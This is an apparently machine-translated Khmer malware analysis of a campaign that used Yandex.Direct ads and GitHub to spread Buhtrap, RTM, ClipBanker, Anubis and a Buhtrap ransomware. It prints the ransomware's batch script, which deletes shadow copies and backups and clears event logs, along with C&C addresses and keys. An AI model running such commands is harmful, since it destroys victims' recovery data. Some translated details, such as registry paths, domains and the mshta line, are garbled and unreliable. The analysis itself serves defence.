Backdoor និង Buhtrap encryptor ត្រូវបានចែកចាយដោយប្រើ Yandex.Direct

ដើម្បីកំណត់គោលដៅគណនេយ្យករក្នុងការវាយប្រហារតាមអ៊ីនធឺណិត អ្នកអាចប្រើឯកសារការងារដែលពួកគេស្វែងរកតាមអ៊ីនធឺណិត។ នេះ​ជា​អ្វី​ដែល​ក្រុម​អ៊ីនធឺណិត​មួយ​បាន​និង​កំពុង​ធ្វើ​ក្នុង​រយៈ​ពេល​ប៉ុន្មាន​ខែ​កន្លង​មក​នេះ ដោយ​ចែក​ចាយ​ព័ត៌មាន​ដែល​គេ​ស្គាល់។ Buhtrap и RTMក៏ដូចជាឧបករណ៍បំលែងកូដ និងកម្មវិធីសម្រាប់លួចរូបិយប័ណ្ណគ្រីបតូ។ គោលដៅភាគច្រើនមានទីតាំងនៅប្រទេសរុស្ស៊ី។ ការវាយប្រហារនេះត្រូវបានអនុវត្តដោយដាក់ការផ្សាយពាណិជ្ជកម្មព្យាបាទនៅលើ Yandex.Direct ។ ជនរងគ្រោះដែលមានសក្តានុពលត្រូវបានបញ្ជូនទៅគេហទំព័រមួយដែលពួកគេត្រូវបានគេស្នើសុំឱ្យទាញយកឯកសារព្យាបាទដែលក្លែងធ្វើជាគំរូឯកសារ។ Yandex បានលុបការផ្សាយពាណិជ្ជកម្មដែលមានគំនិតអាក្រក់បន្ទាប់ពីការព្រមានរបស់យើង។

កូដប្រភពរបស់ Buhtrap ត្រូវបានលេចធ្លាយលើអ៊ីនធឺណិតនាពេលកន្លងមក ដូច្នេះអ្នកណាក៏អាចប្រើវាបាន។ យើងមិនមានព័ត៌មានទាក់ទងនឹងការមានលេខកូដ RTM ទេ។

នៅក្នុងការប្រកាសនេះ យើងនឹងប្រាប់អ្នកពីរបៀបដែលអ្នកវាយប្រហារចែកចាយមេរោគដោយប្រើ Yandex.Direct ហើយបង្ហោះវានៅលើ GitHub ។ ការបង្ហោះនឹងបញ្ចប់ជាមួយនឹងការវិភាគបច្ចេកទេសនៃមេរោគ។

Buhtrap និង RTM ត្រលប់មករកស៊ីវិញហើយ។

យន្តការនៃការរីករាលដាល និងជនរងគ្រោះ

បន្ទុកផ្សេងៗដែលបញ្ជូនទៅជនរងគ្រោះមានយន្តការផ្សព្វផ្សាយទូទៅ។ រាល់ឯកសារព្យាបាទដែលបង្កើតដោយអ្នកវាយប្រហារត្រូវបានដាក់ក្នុងឃ្លាំង GitHub ពីរផ្សេងគ្នា។

ជាធម្មតា ឃ្លាំងផ្ទុកឯកសារព្យាបាទដែលអាចទាញយកបានមួយ ដែលផ្លាស់ប្តូរជាញឹកញាប់។ ដោយសារ GitHub អនុញ្ញាតឱ្យអ្នកមើលប្រវត្តិនៃការផ្លាស់ប្តូរទៅកន្លែងផ្ទុក យើងអាចដឹងថាមេរោគអ្វីខ្លះត្រូវបានចែកចាយក្នុងអំឡុងពេលជាក់លាក់មួយ។ ដើម្បីបញ្ចុះបញ្ចូលជនរងគ្រោះឱ្យទាញយកឯកសារព្យាបាទ គេហទំព័រ blanki-shabloni24[.]ru ដែលបង្ហាញក្នុងរូបភាពខាងលើត្រូវបានប្រើប្រាស់។

ការរចនានៃគេហទំព័រ និងឈ្មោះទាំងអស់នៃឯកសារព្យាបាទធ្វើតាមគំនិតតែមួយ - ទម្រង់ គំរូ កិច្ចសន្យា គំរូ។ល។ ដោយពិចារណាថាកម្មវិធី Buhtrap និង RTM ត្រូវបានប្រើប្រាស់រួចហើយក្នុងការវាយប្រហារលើគណនេយ្យករនាពេលកន្លងមក យើងបានសន្មត់ថា យុទ្ធសាស្ត្រក្នុងយុទ្ធនាការថ្មីគឺដូចគ្នា។ សំណួរតែមួយគត់គឺថាតើជនរងគ្រោះចូលទៅគេហទំព័ររបស់អ្នកវាយប្រហារដោយរបៀបណា។

ការ​ឆ្លង​មេរោគ

យ៉ាងហោចណាស់ជនរងគ្រោះដែលមានសក្តានុពលជាច្រើនដែលបានបញ្ចប់នៅលើគេហទំព័រនេះត្រូវបានទាក់ទាញដោយការផ្សាយពាណិជ្ជកម្មព្យាបាទ។ ខាងក្រោមនេះជាឧទាហរណ៍ URL៖

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

ដូចដែលអ្នកអាចមើលឃើញពីតំណ បដាត្រូវបានបង្ហោះនៅលើវេទិកាគណនេយ្យស្របច្បាប់ bb.f2[.]kz ។ វាជាការសំខាន់ក្នុងការកត់សម្គាល់ថាផ្ទាំងបដាបានបង្ហាញខ្លួននៅលើគេហទំព័រផ្សេងៗគ្នា ទាំងអស់មានលេខសម្គាល់យុទ្ធនាការដូចគ្នា (blanki_rsya) ហើយភាគច្រើនទាក់ទងនឹងសេវាកម្មផ្នែកគណនេយ្យ ឬផ្នែកច្បាប់។ URL បង្ហាញថាជនរងគ្រោះដែលមានសក្តានុពលបានប្រើសំណើ "ទាញយកទម្រង់វិក្កយបត្រ" ដែលគាំទ្រសម្មតិកម្មរបស់យើងអំពីការវាយប្រហារគោលដៅ។ ខាងក្រោមនេះជាគេហទំព័រដែលផ្ទាំងបដាបានបង្ហាញខ្លួន និងសំណួរស្វែងរកដែលត្រូវគ្នា។

• ទាញយកទម្រង់វិក្កយបត្រ – bb.f2[.]kz
• កិច្ចសន្យាគំរូ - Ipopen[.]ru
• គំរូពាក្យបណ្តឹងកម្មវិធី - 77metrov[.]ru
• ទម្រង់កិច្ចព្រមព្រៀង - blank-dogovor-kupli-prodazhi [.]ru
• ញត្តិរបស់តុលាការគំរូ - zen.yandex[.]ru
• ពាក្យបណ្តឹងគំរូ - yurday[.]ru
• ទម្រង់កិច្ចសន្យាគំរូ - វេទិការ[.]ru
• ទម្រង់កិច្ចសន្យា – assistentus[.]ru
• កិច្ចព្រមព្រៀងផ្ទះល្វែងគំរូ – napravah[.]com
• គំរូកិច្ចសន្យាផ្លូវច្បាប់ - Avito[.]ru

គេហទំព័រ blanki-shabloni24[.]ru អាចត្រូវបានកំណត់រចនាសម្ព័ន្ធដើម្បីឆ្លងកាត់ការវាយតម្លៃដែលមើលឃើញសាមញ្ញ។ ជាធម្មតា ការផ្សាយពាណិជ្ជកម្មដែលចង្អុលទៅកាន់គេហទំព័រដែលមើលទៅមានលក្ខណៈវិជ្ជាជីវៈជាមួយនឹងតំណភ្ជាប់ទៅកាន់ GitHub ហាក់ដូចជាមិនមានភាពអាក្រក់នោះទេ។ លើសពីនេះ អ្នកវាយប្រហារបានបង្ហោះឯកសារព្យាបាទទៅក្នុងឃ្លាំងសម្រាប់តែរយៈពេលកំណត់ប៉ុណ្ណោះ ដែលទំនងជាក្នុងអំឡុងពេលយុទ្ធនាការ។ ភាគច្រើន ឃ្លាំង GitHub មានផ្ទុកឯកសារ zip ទទេ ឬឯកសារ EXE ទទេ។ ដូច្នេះ អ្នកវាយប្រហារអាចចែកចាយការផ្សាយពាណិជ្ជកម្មតាមរយៈ Yandex.Direct នៅលើគេហទំព័រដែលទំនងជាត្រូវបានចូលមើលដោយគណនេយ្យករដែលចូលមកក្នុងការឆ្លើយតបទៅនឹងសំណួរស្វែងរកជាក់លាក់។

បន្ទាប់​មក យើង​មើល​បន្ទុក​ផ្សេងៗ​ដែល​បាន​ចែកចាយ​តាម​វិធី​នេះ។

ការវិភាគបន្ទុក

កាលប្បវត្តិនៃការចែកចាយ

យុទ្ធនាការព្យាបាទបានចាប់ផ្តើមនៅចុងខែតុលា ឆ្នាំ 2018 ហើយសកម្មនៅពេលសរសេរ។ ដោយសារឃ្លាំងទាំងមូលមានជាសាធារណៈនៅលើ GitHub យើងបានចងក្រងការកំណត់ពេលវេលាត្រឹមត្រូវនៃការចែកចាយនៃពពួកមេរោគចំនួនប្រាំមួយផ្សេងគ្នា (សូមមើលរូបភាពខាងក្រោម)។ យើង​បាន​បន្ថែម​បន្ទាត់​ដែល​បង្ហាញ​ពី​ពេល​ដែល​តំណ​បដា​ត្រូវ​បាន​រក​ឃើញ ដូច​ជា​វាស់​ដោយ​តេឡេមេទ្រី ESET សម្រាប់​ការ​ប្រៀប​ធៀប​ជាមួយ​ប្រវត្តិ git។ ដូចដែលអ្នកអាចឃើញវាទាក់ទងយ៉ាងល្អជាមួយនឹងភាពអាចរកបាននៃ payload នៅលើ GitHub ។ ភាពខុសគ្នានៅចុងខែកុម្ភៈអាចត្រូវបានពន្យល់ដោយការពិតដែលថាយើងមិនមានផ្នែកនៃប្រវត្តិការផ្លាស់ប្តូរទេព្រោះឃ្លាំងត្រូវបានដកចេញពី GitHub មុនពេលយើងអាចទទួលបានវាពេញលេញ។

រូបភាពទី 1. កាលប្បវត្តិនៃការចែកចាយមេរោគ។

វិញ្ញាបនបត្រចុះហត្ថលេខាលើកូដ

យុទ្ធនាការបានប្រើវិញ្ញាបនបត្រជាច្រើន។ មួយចំនួនត្រូវបានចុះហត្ថលេខាដោយគ្រួសារមេរោគច្រើនជាងមួយ ដែលបញ្ជាក់បន្ថែមថាគំរូផ្សេងគ្នាជាកម្មសិទ្ធិរបស់យុទ្ធនាការដូចគ្នា។ ទោះបីជាមានសោឯកជនក៏ដោយ ប្រតិបត្តិករមិនបានចុះហត្ថលេខាជាប្រព័ន្ធប្រព័ន្ធគោលពីរទេ ហើយមិនបានប្រើសោសម្រាប់គំរូទាំងអស់នោះទេ។ នៅចុងខែកុម្ភៈ ឆ្នាំ 2019 អ្នកវាយប្រហារបានចាប់ផ្តើមបង្កើតហត្ថលេខាមិនត្រឹមត្រូវដោយប្រើវិញ្ញាបនបត្រដែលគ្រប់គ្រងដោយ Google ដែលពួកគេមិនមានសោឯកជន។

វិញ្ញាបនបត្រទាំងអស់ដែលពាក់ព័ន្ធនឹងយុទ្ធនាការ និងក្រុមគ្រួសារមេរោគដែលពួកគេចុះហត្ថលេខាត្រូវបានរាយក្នុងតារាងខាងក្រោម។

យើងក៏បានប្រើវិញ្ញាបនបត្រចុះហត្ថលេខាលើកូដទាំងនេះផងដែរ ដើម្បីបង្កើតតំណភ្ជាប់ជាមួយក្រុមគ្រួសារមេរោគផ្សេងទៀត។ សម្រាប់វិញ្ញាបនបត្រភាគច្រើន យើងមិនបានរកឃើញគំរូដែលមិនត្រូវបានចែកចាយតាមរយៈឃ្លាំង GitHub ទេ។ ទោះយ៉ាងណាក៏ដោយ វិញ្ញាបនបត្រ TOV “MARIYA” ត្រូវបានប្រើដើម្បីចុះហត្ថលេខាលើមេរោគដែលជាកម្មសិទ្ធិរបស់ botnet វ៉ូចូស, Adware និងអ្នករុករករ៉ែ។ វាមិនទំនងថាមេរោគនេះពាក់ព័ន្ធនឹងយុទ្ធនាការនេះទេ។ ភាគច្រើនទំនងជា វិញ្ញាបនបត្រត្រូវបានទិញនៅលើបណ្តាញងងឹត។

Win32/Filecoder.Buhtrap

សមាសធាតុដំបូងដែលទាក់ទាញការចាប់អារម្មណ៍របស់យើងគឺ Win32/Filecoder.Buhtrap ដែលទើបរកឃើញថ្មី។ នេះគឺជាឯកសារប្រព័ន្ធគោលពីរ Delphi ដែលជួនកាលត្រូវបានខ្ចប់។ វាត្រូវបានចែកចាយជាចម្បងនៅក្នុងខែកុម្ភៈ ដល់ខែមីនា ឆ្នាំ 2019។ វាដំណើរការដូចទៅនឹងកម្មវិធី ransomware - វាស្វែងរកដ្រាយក្នុងតំបន់ និងថតបណ្តាញ និងអ៊ិនគ្រីបឯកសារដែលបានរកឃើញ។ វា​មិន​ត្រូវ​ការ​ការ​តភ្ជាប់​អ៊ីនធឺណិត​ដើម្បី​ត្រូវ​បាន​គេ​សម្របសម្រួល​ទេ​ព្រោះ​វា​មិន​ទាក់ទង​ទៅ​ម៉ាស៊ីន​បម្រើ​ដើម្បី​ផ្ញើ​សោ​អ៊ិនគ្រីប​។ ជំនួសមកវិញ វាបន្ថែម "សញ្ញាសម្ងាត់" ទៅចុងបញ្ចប់នៃសារតម្លៃលោះ ហើយស្នើឱ្យប្រើអ៊ីមែល ឬ Bitmessage ដើម្បីទាក់ទងប្រតិបត្តិករ។

ដើម្បីអ៊ិនគ្រីបធនធានរសើបឱ្យបានច្រើនតាមដែលអាចធ្វើទៅបាន Filecoder.Buhtrap ដំណើរការខ្សែស្រឡាយដែលត្រូវបានរចនាឡើងដើម្បីបិទកម្មវិធីគន្លឹះដែលអាចមានឧបករណ៍ដោះស្រាយឯកសារបើកចំហដែលមានព័ត៌មានដ៏មានតម្លៃដែលអាចរំខានដល់ការអ៊ិនគ្រីប។ ដំណើរការគោលដៅភាគច្រើនគឺប្រព័ន្ធគ្រប់គ្រងមូលដ្ឋានទិន្នន័យ (DBMS)។ លើសពីនេះ Filecoder.Buhtrap លុបឯកសារកំណត់ហេតុ និងការបម្រុងទុកដើម្បីធ្វើឱ្យការងើបឡើងវិញទិន្នន័យពិបាក។ ដើម្បីធ្វើដូច្នេះ សូមដំណើរការស្គ្រីបជាបាច់ខាងក្រោម។

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ប្រើប្រាស់សេវាកម្ម IP Logger អនឡាញស្របច្បាប់ដែលត្រូវបានរចនាឡើងដើម្បីប្រមូលព័ត៌មានអំពីអ្នកចូលមើលគេហទំព័រ។ នេះគឺមានបំណងតាមដានជនរងគ្រោះនៃ ransomware ដែលជាទំនួលខុសត្រូវនៃបន្ទាត់ពាក្យបញ្ជា៖

mshta.exe "javascript:document.write('');"

ឯកសារសម្រាប់ការអ៊ិនគ្រីបត្រូវបានជ្រើសរើស ប្រសិនបើពួកវាមិនត្រូវគ្នានឹងបញ្ជីដកចេញចំនួនបី។ ទីមួយ ឯកសារដែលមានផ្នែកបន្ថែមខាងក្រោមមិនត្រូវបានអ៊ិនគ្រីបទេ៖ .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys និង .bat. ទីពីរ ឯកសារទាំងអស់ដែលផ្លូវពេញមានខ្សែអក្សរថតពីបញ្ជីខាងក្រោមត្រូវបានដកចេញ។

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

ទីបី ឈ្មោះឯកសារមួយចំនួនក៏ត្រូវបានដកចេញពីការអ៊ិនគ្រីបដែរ ក្នុងចំណោមនោះឈ្មោះឯកសារនៃសារតម្លៃលោះ។ បញ្ជីត្រូវបានបង្ហាញខាងក្រោម។ ជាក់ស្តែង ការលើកលែងទាំងអស់នេះគឺមានគោលបំណងរក្សាម៉ាស៊ីនឱ្យដំណើរការ ប៉ុន្តែជាមួយនឹងភាពសក្តិសមនៃផ្លូវតិចតួចបំផុត។

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

គ្រោងការណ៍ការអ៊ិនគ្រីបឯកសារ

នៅពេលដែលត្រូវបានប្រតិបត្តិ មេរោគនឹងបង្កើតគូសោ RSA 512 ប៊ីត។ បន្ទាប់មក និទស្សន្តឯកជន (d) និងម៉ូឌុល (n) ត្រូវបានអ៊ិនគ្រីបជាមួយនឹងកូដរឹងសាធារណៈ 2048 ប៊ីត (និទស្សន្តសាធារណៈ និងម៉ូឌុល) zlib-packed និង base64 ដែលបានអ៊ិនកូដ។ លេខកូដដែលទទួលខុសត្រូវចំពោះបញ្ហានេះត្រូវបានបង្ហាញក្នុងរូបភាពទី 2 ។

រូបភាពទី 2. លទ្ធផលនៃការបំបែក Hex-Rays នៃដំណើរការបង្កើតគូគន្លឹះ RSA 512 ប៊ីត។

ខាងក្រោមនេះជាឧទាហរណ៍នៃអត្ថបទធម្មតាដែលមានសោឯកជនដែលបានបង្កើត ដែលជាសញ្ញាសម្ងាត់ដែលភ្ជាប់ទៅនឹងសារតម្លៃលោះ។

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

សោសាធារណៈរបស់អ្នកវាយប្រហារត្រូវបានផ្តល់ឱ្យខាងក្រោម។

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ឯកសារត្រូវបានអ៊ិនគ្រីបដោយប្រើ AES-128-CBC ជាមួយនឹងសោ 256 ប៊ីត។ សម្រាប់ឯកសារដែលបានអ៊ិនគ្រីបនីមួយៗ សោថ្មី និងវ៉ិចទ័រចាប់ផ្តើមថ្មីត្រូវបានបង្កើត។ ព័ត៌មានគន្លឹះត្រូវបានបន្ថែមទៅចុងបញ្ចប់នៃឯកសារដែលបានអ៊ិនគ្រីប។ ចូរយើងពិចារណាអំពីទម្រង់នៃឯកសារដែលបានអ៊ិនគ្រីប។
ឯកសារដែលបានអ៊ិនគ្រីបមានបឋមកថាដូចខាងក្រោម៖

ទិន្នន័យឯកសារប្រភពជាមួយនឹងការបន្ថែមតម្លៃវេទមន្ត VEGA ត្រូវបានអ៊ិនគ្រីបទៅជា 0x5000 បៃដំបូង។ ព័ត៌មាននៃការឌិគ្រីបទាំងអស់ត្រូវបានភ្ជាប់ទៅឯកសារដែលមានរចនាសម្ព័ន្ធដូចខាងក្រោម៖

- សញ្ញាសម្គាល់ទំហំឯកសារមានសញ្ញាសម្គាល់ថាតើឯកសារមានទំហំធំជាងទំហំ 0x5000 បៃ
— AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAencrypt(បង្កើតសោឯកជន RSA, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker គឺជាសមាសធាតុមួយដែលត្រូវបានចែកចាយជាបន្តបន្ទាប់ចាប់ពីចុងខែតុលាដល់ដើមខែធ្នូ ឆ្នាំ2018។ តួនាទីរបស់វាគឺដើម្បីត្រួតពិនិត្យមាតិកានៃក្តារតម្បៀតខ្ទាស់វារកមើលអាសយដ្ឋាននៃកាបូប cryptocurrency ។ ដោយបានកំណត់អាសយដ្ឋានកាបូបគោលដៅ ClipBanker ជំនួសវាដោយអាសយដ្ឋានដែលគេជឿថាជារបស់ប្រតិបត្តិករ។ សំណាក​ដែល​យើង​ពិនិត្យ​គឺ​មិន​មាន​ប្រអប់ ឬ​មិន​ច្បាស់​លាស់​ទេ។ យន្តការតែមួយគត់ដែលប្រើដើម្បីបិទបាំងឥរិយាបថគឺការអ៊ិនគ្រីបខ្សែអក្សរ។ អាសយដ្ឋានកាបូបរបស់ប្រតិបត្តិករត្រូវបានអ៊ិនគ្រីបដោយប្រើ RC4 ។ រូបិយប័ណ្ណឌីជីថលគោលដៅគឺ Bitcoin, Bitcoin សាច់ប្រាក់, Dogecoin, Ethereum និង Ripple ។

ក្នុងអំឡុងពេលដែលមេរោគកំពុងរីករាលដាលទៅកាន់កាបូប Bitcoin របស់អ្នកវាយប្រហារ ចំនួនតិចតួចត្រូវបានបញ្ជូនទៅ VTS ដែលបង្កឱ្យមានការសង្ស័យលើភាពជោគជ័យនៃយុទ្ធនាការ។ លើសពីនេះទៀត មិនមានភ័ស្តុតាងណាមួយដែលបង្ហាញថាប្រតិបត្តិការទាំងនេះទាក់ទងនឹង ClipBanker ទាល់តែសោះ។

Win32/RTM

សមាសភាគ Win32/RTM ត្រូវបានចែកចាយជាច្រើនថ្ងៃនៅដើមខែមីនា ឆ្នាំ 2019។ RTM គឺជាធនាគារិក Trojan ដែលត្រូវបានសរសេរនៅក្នុង Delphi ដែលមានគោលបំណងលើប្រព័ន្ធធនាគារពីចម្ងាយ។ នៅឆ្នាំ 2017 អ្នកស្រាវជ្រាវ ESET បានបោះពុម្ពផ្សាយ ការវិភាគលម្អិត នៃកម្មវិធីនេះ ការពិពណ៌នានៅតែពាក់ព័ន្ធ។ នៅខែមករាឆ្នាំ 2019 Palo Alto Networks ក៏បានចេញផ្សាយផងដែរ។ ប្រកាសប្លក់អំពី RTM.

ឧបករណ៍ផ្ទុក Buhtrap

សម្រាប់ពេលខ្លះ កម្មវិធីទាញយកមាននៅលើ GitHub ដែលមិនស្រដៀងនឹងឧបករណ៍ Buhtrap មុននោះទេ។ គាត់ងាកទៅ https://94.100.18[.]67/RSS.php?<some_id> ដើម្បីទទួលបានដំណាក់កាលបន្ទាប់ ហើយផ្ទុកវាដោយផ្ទាល់ទៅក្នុងអង្គចងចាំ។ យើងអាចបែងចែកឥរិយាបថពីរនៃកូដដំណាក់កាលទីពីរ។ នៅក្នុង URL ដំបូង RSS.php បានឆ្លងកាត់ Buhtrap backdoor ដោយផ្ទាល់ - backdoor នេះគឺស្រដៀងទៅនឹងអ្វីដែលមានបន្ទាប់ពីកូដប្រភពត្រូវបានលេចធ្លាយ។

គួរឱ្យចាប់អារម្មណ៍ យើងឃើញយុទ្ធនាការជាច្រើនជាមួយ Buhtrap backdoor ហើយពួកគេត្រូវបានចោទប្រកាន់ថាដំណើរការដោយប្រតិបត្តិករផ្សេងៗគ្នា។ ក្នុងករណីនេះ ភាពខុសគ្នាសំខាន់គឺថា backdoor ត្រូវបានផ្ទុកដោយផ្ទាល់ទៅក្នុងអង្គចងចាំ ហើយមិនប្រើគ្រោងការណ៍ធម្មតាជាមួយនឹងដំណើរការដាក់ពង្រាយ DLL ដែលយើងបាននិយាយនោះទេ។ មុន. លើសពីនេះទៀត ប្រតិបត្តិករបានផ្លាស់ប្តូរសោ RC4 ដែលប្រើដើម្បីអ៊ិនគ្រីបចរាចរបណ្តាញទៅម៉ាស៊ីនមេ C&C ។ នៅក្នុងយុទ្ធនាការភាគច្រើនដែលយើងបានឃើញ ប្រតិបត្តិករមិនបានរំខានការផ្លាស់ប្តូរសោនេះទេ។

អាកប្បកិរិយាដ៏ស្មុគស្មាញទីពីរគឺថា URL RSS.php ត្រូវបានបញ្ជូនទៅកម្មវិធីផ្ទុកផ្សេងទៀត។ វាបានអនុវត្តភាពច្របូកច្របល់មួយចំនួន ដូចជាការកសាងឡើងវិញនូវតារាងនាំចូលថាមវន្ត។ គោលបំណងនៃកម្មវិធីចាប់ផ្ដើមប្រព័ន្ធគឺដើម្បីទាក់ទងម៉ាស៊ីនមេ C&C msiofficeupd[.]com/api/F27F84EDA4D13B15/2 ផ្ញើកំណត់ហេតុ ហើយរង់ចាំការឆ្លើយតប។ វាដំណើរការការឆ្លើយតបជាប្លុក ផ្ទុកវាទៅក្នុងអង្គចងចាំ ហើយប្រតិបត្តិវា។ បន្ទុកដែលយើងបានឃើញការប្រតិបត្តិកម្មវិធីផ្ទុកនេះគឺដូចគ្នាបេះបិទ Buhtrap ប៉ុន្តែអាចមានសមាសភាគផ្សេងទៀត។

ប្រព័ន្ធប្រតិបត្តិការ Android/Spy.Banker

គួរឱ្យចាប់អារម្មណ៍សមាសធាតុមួយសម្រាប់ប្រព័ន្ធប្រតិបត្តិការ Android ក៏ត្រូវបានរកឃើញនៅក្នុងឃ្លាំង GitHub ផងដែរ។ គាត់​នៅ​សាខា​ធំ​តែ​មួយ​ថ្ងៃ​ប៉ុណ្ណោះ គឺ​ថ្ងៃ​ទី 1 ខែ​វិច្ឆិកា ឆ្នាំ 2018។ ក្រៅពីត្រូវបានបង្ហោះនៅលើ GitHub, ESET telemetry រកមិនឃើញភស្តុតាងនៃមេរោគនេះដែលត្រូវបានចែកចាយ។

សមាសភាគត្រូវបានបង្ហោះជាកញ្ចប់កម្មវិធី Android (APK) ។ វា​មាន​ភាព​ច្របូកច្របល់​ខ្លាំង។ អាកប្បកិរិយាព្យាបាទត្រូវបានលាក់នៅក្នុង JAR ដែលបានអ៊ិនគ្រីបដែលមានទីតាំងនៅក្នុង APK ។ វាត្រូវបានអ៊ិនគ្រីបជាមួយ RC4 ដោយប្រើសោនេះ៖

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

គ្រាប់ចុច និងក្បួនដោះស្រាយដូចគ្នាត្រូវបានប្រើដើម្បីអ៊ិនគ្រីបខ្សែអក្សរ។ JAR មានទីតាំងនៅ APK_ROOT + image/files. 4 បៃដំបូងនៃឯកសារមានប្រវែងនៃ JAR ដែលបានអ៊ិនគ្រីប ដែលចាប់ផ្តើមភ្លាមៗបន្ទាប់ពីវាលប្រវែង។

ដោយបានឌិគ្រីបឯកសារ យើងបានរកឃើញថាវាជា Anubis - ពីមុន បានចងក្រងជាឯកសារ ធនាគារិកសម្រាប់ប្រព័ន្ធប្រតិបត្តិការ Android ។ មេរោគមានមុខងារដូចខាងក្រោមៈ

• ការថតមីក្រូហ្វូន
• ថតរូបអេក្រង់
• ទទួលបានកូអរដោនេ GPS
• keylogger
• ការអ៊ិនគ្រីបទិន្នន័យឧបករណ៍ និងការទាមទារតម្លៃលោះ
• ផ្ញើសារឥតបានការ

គួរឱ្យចាប់អារម្មណ៍ ធនាគារិកបានប្រើ Twitter ជាបណ្តាញទំនាក់ទំនងបម្រុងទុក ដើម្បីទទួលបានម៉ាស៊ីនមេ C&C ផ្សេងទៀត។ គំរូដែលយើងវិភាគបានប្រើគណនី @JonesTrader ប៉ុន្តែនៅពេលធ្វើការវិភាគ វាត្រូវបានរារាំងរួចហើយ។

ធនាគារិកមានបញ្ជីកម្មវិធីគោលដៅនៅលើឧបករណ៍ Android ។ វា​វែង​ជាង​បញ្ជី​ដែល​ទទួល​បាន​ក្នុង​ការ​សិក្សា​សោភ័ណ។ បញ្ជីនេះរួមមានកម្មវិធីធនាគារជាច្រើន កម្មវិធីទិញទំនិញតាមអ៊ីនធឺណិតដូចជា Amazon និង eBay និងសេវាកម្មរូបិយប័ណ្ណគ្រីបតូ។

MSIL/ClipBanker.IH

សមាសភាគចុងក្រោយដែលត្រូវបានចែកចាយជាផ្នែកនៃយុទ្ធនាការនេះគឺ .NET Windows អាចប្រតិបត្តិបាន ដែលបានបង្ហាញខ្លួននៅក្នុងខែមីនា ឆ្នាំ 2019។ កំណែភាគច្រើនដែលបានសិក្សាត្រូវបានខ្ចប់ជាមួយ ConfuserEx v1.0.0 ។ ដូច ClipBanker សមាសធាតុនេះប្រើក្តារតម្បៀតខ្ទាស់។ គោលដៅរបស់គាត់គឺទូលំទូលាយនៃរូបិយប័ណ្ណគ្រីបតូ ក៏ដូចជាការផ្តល់ជូននៅលើ Steam ។ លើសពីនេះទៀតគាត់ប្រើសេវាកម្ម IP Logger ដើម្បីលួចសោរ WIF ឯកជនរបស់ Bitcoin ។

យន្តការការពារ
បន្ថែមពីលើអត្ថប្រយោជន៍ដែល ConfuserEx ផ្តល់ឲ្យក្នុងការការពារការបំបាត់កំហុស ការបោះចោល និងការរំខាន សមាសធាតុនេះរួមបញ្ចូលទាំងសមត្ថភាពក្នុងការរកឃើញផលិតផលកំចាត់មេរោគ និងម៉ាស៊ីននិម្មិត។

